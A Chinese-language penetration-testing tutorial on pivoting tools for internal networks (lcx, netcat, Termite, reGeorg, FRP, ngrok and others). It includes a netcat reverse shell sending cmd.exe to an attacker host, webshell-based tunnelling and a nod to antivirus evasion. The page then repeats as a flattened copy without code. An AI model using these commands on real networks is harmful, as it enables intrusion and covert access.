内网渗透之端口转发与代理工具总结
字数 1488 2025-08-18 11:37:19

内网渗透之端口转发与代理工具详解

一、端口转发基础概念

在渗透测试中,当目标主机处于内网环境时,我们需要借助端口转发工具与目标主机建立通信通道。端口转发主要分为两种类型:

  1. 端口转发:将内网主机的端口流量转发到公网主机的指定端口
  2. 端口映射:将目标主机的受限端口映射到防火墙允许的其他端口

二、LCX工具详解

Windows版LCX

1. 内网端口转发

操作步骤

  1. 在内网主机上执行:

    lcx.exe -slave 公网主机IP 公网主机端口 内网主机IP 内网主机端口
    

    示例:将内网3389端口转发到公网主机的4444端口

    lcx.exe -slave 公网主机IP 4444 127.0.0.1 3389
    
  2. 在公网主机上执行:

    lcx.exe -listen 接收端口 转发端口
    

    示例:

    lcx.exe -listen 4444 5555
    

连接方式

  • 公网主机操作:mstsc /v:127.0.0.1:5555
  • 本地主机操作:mstsc /v:公网主机IP:5555

2. 本地端口转发

当3389端口被防火墙阻止时,可将其映射到允许的端口(如53):

lcx -tran 53 目标主机IP 3389

连接方式:mstsc /v:目标主机IP:53

Linux版Portmap

  1. 公网主机执行:

    ./portmap -m 2 -p1 6666 -h2 公网主机IP -p2 7777
    
  2. 内网主机执行:

    ./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机IP -p2 6666
    
  3. 连接方式:

    ssh 公网主机IP 7777
    

三、NC工具使用

反向连接

  1. 公网主机监听:

    nc -lvp 4444
    
  2. 内网主机执行:

    nc -t -e cmd.exe 公网主机IP 4444
    

正向连接

  1. 远程主机执行:

    nc -l -p 4444 -t -e cmd.exe
    
  2. 本地主机连接:

    nc -vv 远程主机IP 4444
    

四、Socks代理工具

1. Termite (EW升级版)

主要特性

  • 多平台支持
  • 跳板机互联
  • 正反向级联
  • 内置Shell管理

使用方法

  1. 客户端执行:

    agent_windows_x86.exe -l 4444
    
  2. 管理端执行:

    admin_windows_x86.exe -c 127.0.0.1 -p 4444
    
  3. 添加新agent:

    agent_windows_x86.exe -c 127.0.0.1 -p 4444
    

常用命令

  • show:查看拓扑结构
  • goto [节点ID]:切换管理节点
  • socks [端口]:开启Socks代理
  • shell [端口]:绑定Shell到端口
  • downfile [远程文件] [本地文件]:下载文件
  • upfile [本地文件] [远程文件]:上传文件
  • lcxtran [本地端口] [目标IP] [目标端口]:端口转发

2. reGeorg

特点

  • 通过HTTP/HTTPS隧道转发内网端口
  • 需要目标服务器支持aspx/php/jsp

使用方法

  1. 上传对应webshell到目标服务器
  2. 本地执行:
    python proxy.py -u <webshell地址> -l <本地端口> [选项]
    

3. sSocks

组件功能

  • nsocks:类似通过Socks5代理的netcat
  • ssocksd:开启Socks5代理服务
  • ssocks:本地启用Socks5服务并反弹
  • rcsocks:接收反弹的Socks5服务

使用方法

  1. 公网主机执行:

    ./rcsocks -l 4444 -p 5555 -vv
    
  2. 内网主机执行:

    ./rssocks -vv -s 公网主机IP:5555
    

4. proxychains

特点

  • Linux平台全局代理工具
  • 支持HTTP/SOCKS4/SOCKS5代理
  • 支持代理链

安装

sudo apt-get update
sudo apt-get install proxychains

5. Tunna

使用前提

  • 能够在远程服务器上传webshell

使用方法

python proxy.py -u http://10.3.3.1/test/conn.aspx -l 4444 -r 3389 -v

五、FRP内网穿透

特点

  • 高性能反向代理
  • 支持TCP/UDP/HTTP/HTTPS
  • 支持虚拟主机和自定义域名

服务端配置示例 (frps.ini):

[common]
bind_port = 7000
vhost_http_port = 80
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = password

客户端配置示例 (frpc.ini):

[common]
server_addr = xxx
server_port = 7000

[ssh]
type = tcp
local_port = 22
remote_port = 5555

启动命令

  • 服务端:frps.exe -c frps.ini
  • 客户端:frpc.exe -c frpc.ini

六、ngrok内网穿透

使用方法

  1. 内网主机启动服务:

    python -m SimpleHTTPServer 8089
    
  2. 启动ngrok:

    ngrok.exe http 8089
    
  3. 访问生成的ngrok地址(如http://xxxx.ngrok.io

七、总结

本文详细介绍了内网渗透中常用的端口转发和代理工具,包括:

  1. LCX/Portmap:基础端口转发工具
  2. NC:简单反向Shell工具
  3. Socks代理套件:Termite、reGeorg、sSocks等
  4. FRP:高性能反向代理
  5. ngrok:便捷的内网穿透工具

在实际渗透测试中,应根据目标环境选择合适的工具组合,注意工具的免杀处理和网络环境限制。

内网渗透之端口转发与代理工具详解 一、端口转发基础概念 在渗透测试中,当目标主机处于内网环境时,我们需要借助端口转发工具与目标主机建立通信通道。端口转发主要分为两种类型: 端口转发 :将内网主机的端口流量转发到公网主机的指定端口 端口映射 :将目标主机的受限端口映射到防火墙允许的其他端口 二、LCX工具详解 Windows版LCX 1. 内网端口转发 操作步骤 : 在内网主机上执行: 示例:将内网3389端口转发到公网主机的4444端口 在公网主机上执行: 示例: 连接方式 : 公网主机操作: mstsc /v:127.0.0.1:5555 本地主机操作: mstsc /v:公网主机IP:5555 2. 本地端口转发 当3389端口被防火墙阻止时,可将其映射到允许的端口(如53): 连接方式: mstsc /v:目标主机IP:53 Linux版Portmap 公网主机执行: 内网主机执行: 连接方式: 三、NC工具使用 反向连接 公网主机监听: 内网主机执行: 正向连接 远程主机执行: 本地主机连接: 四、Socks代理工具 1. Termite (EW升级版) 主要特性 : 多平台支持 跳板机互联 正反向级联 内置Shell管理 使用方法 : 客户端执行: 管理端执行: 添加新agent: 常用命令 : show :查看拓扑结构 goto [节点ID] :切换管理节点 socks [端口] :开启Socks代理 shell [端口] :绑定Shell到端口 downfile [远程文件] [本地文件] :下载文件 upfile [本地文件] [远程文件] :上传文件 lcxtran [本地端口] [目标IP] [目标端口] :端口转发 2. reGeorg 特点 : 通过HTTP/HTTPS隧道转发内网端口 需要目标服务器支持aspx/php/jsp 使用方法 : 上传对应webshell到目标服务器 本地执行: 3. sSocks 组件功能 : nsocks :类似通过Socks5代理的netcat ssocksd :开启Socks5代理服务 ssocks :本地启用Socks5服务并反弹 rcsocks :接收反弹的Socks5服务 使用方法 : 公网主机执行: 内网主机执行: 4. proxychains 特点 : Linux平台全局代理工具 支持HTTP/SOCKS4/SOCKS5代理 支持代理链 安装 : 5. Tunna 使用前提 : 能够在远程服务器上传webshell 使用方法 : 五、FRP内网穿透 特点 : 高性能反向代理 支持TCP/UDP/HTTP/HTTPS 支持虚拟主机和自定义域名 服务端配置示例 ( frps.ini ): 客户端配置示例 ( frpc.ini ): 启动命令 : 服务端: frps.exe -c frps.ini 客户端: frpc.exe -c frpc.ini 六、ngrok内网穿透 使用方法 : 内网主机启动服务: 启动ngrok: 访问生成的ngrok地址(如 http://xxxx.ngrok.io ) 七、总结 本文详细介绍了内网渗透中常用的端口转发和代理工具,包括: LCX/Portmap :基础端口转发工具 NC :简单反向Shell工具 Socks代理套件 :Termite、reGeorg、sSocks等 FRP :高性能反向代理 ngrok :便捷的内网穿透工具 在实际渗透测试中,应根据目标环境选择合适的工具组合,注意工具的免杀处理和网络环境限制。